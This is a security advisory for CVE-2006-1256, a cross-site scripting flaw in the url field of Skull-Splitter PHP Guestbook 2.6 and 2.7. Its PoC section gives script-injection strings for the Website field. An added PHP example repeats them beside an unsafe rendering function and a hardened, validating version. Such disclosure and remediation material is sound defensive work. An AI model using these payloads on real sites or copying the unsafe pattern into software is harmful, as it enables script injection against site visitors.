XSS Vulnerability in Skull-Splitter PHP Guestbook
Summary
- Vulnerability: XSS Vulnerability in Skull-Splitter PHP Guestbook
- Discovered: 2006.03.17
- Last Update: 2006.03.27 Exploitation code published
- ID: EV0104
- CVE: CVE-2006-1256
- Risk Level: low
- Type: Cross Site Scripting
- Status: Patched
- Vendor: n/a
- Vulnerable Software: Skull-Splitter's PHP Guestbook (http://www.boysen.be/)
- Version: 2.6, 2.7
- PoC/Exploit: Available
- Solution: Available
- Discovered by: Aliaksandr Hartsuyeu (eVuln.com)
Description
A cross-site scripting vulnerability was found in the Skull-Splitter's PHP Guestbook (http://www.boysen.be/) script.
Vulnerable Script: guestbook.php
The url parameter isn't properly sanitized. This can be used to post arbitrary HTML or JavaScript code.
Condition: magic_quotes_gpc = off
PoC/Exploit
Cross-Site Scripting Example:
Version 2.6
URL: http://[host]/guestbook.php?part=add_form
Website: aaa"><script>alert("Vulnerable")</script><aaa a="
Version 2.7
URL: http://[host]/guestbook.php?part=add_form
Website: http://domainbegin"><script>alert("Vulnerable")</script><aaa a="domainend.com
Solution
To fix this problem, install or upgrade to version 2.75 provided by the vendor.
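For sites that render a visitor-supplied website field themselves, the following added example (not code from the guestbook or from the vendor's 2.75 release) shows the unsafe output pattern beside a hardened one that validates the URL and encodes it for the attribute context. The function names and the surrounding markup are hypothetical; the first two sample values are the Website strings from the PoC section above.

```php
<?php
// Added example: hypothetical helpers, not code from the guestbook itself.

// Unsafe pattern: the submitted Website value goes into the href attribute
// unchanged, so a double quote in the value closes the attribute early.
function render_website_unsafe(string $url): string
{
    return '<a href="' . $url . '">Website</a>';
}

// Encode for an HTML attribute context: quotes and angle brackets become
// entities and can no longer terminate the attribute or open a tag.
function encode_attr(string $value): string
{
    return htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

// Hardened pattern: accept only well-formed http(s) URLs, then encode on output.
function render_website_safe(string $url): string
{
    $url = trim($url);
    $scheme = strtolower((string) parse_url($url, PHP_URL_SCHEME));
    if (filter_var($url, FILTER_VALIDATE_URL) === false
        || !in_array($scheme, ['http', 'https'], true)) {
        return ''; // rejected: render no link
    }
    return '<a href="' . encode_attr($url) . '" rel="nofollow">Website</a>';
}

// The two Website values from the PoC section, plus a constructed benign URL.
$samples = [
    'aaa"><script>alert("Vulnerable")</script><aaa a="',
    'http://domainbegin"><script>alert("Vulnerable")</script><aaa a="domainend.com',
    'http://example.com/?a=1&b=2',
];

foreach ($samples as $value) {
    $safe = render_website_safe($value);
    echo 'input:   ', $value, PHP_EOL;
    echo 'unsafe:  ', render_website_unsafe($value), PHP_EOL;
    echo 'encoded: ', encode_attr($value), PHP_EOL;
    echo 'safe:    ', ($safe === '' ? '(rejected, no link rendered)' : $safe), PHP_EOL, PHP_EOL;
}
```

Run it with the PHP command-line interpreter (PHP 7 or later) so the output is shown as text rather than interpreted by a browser.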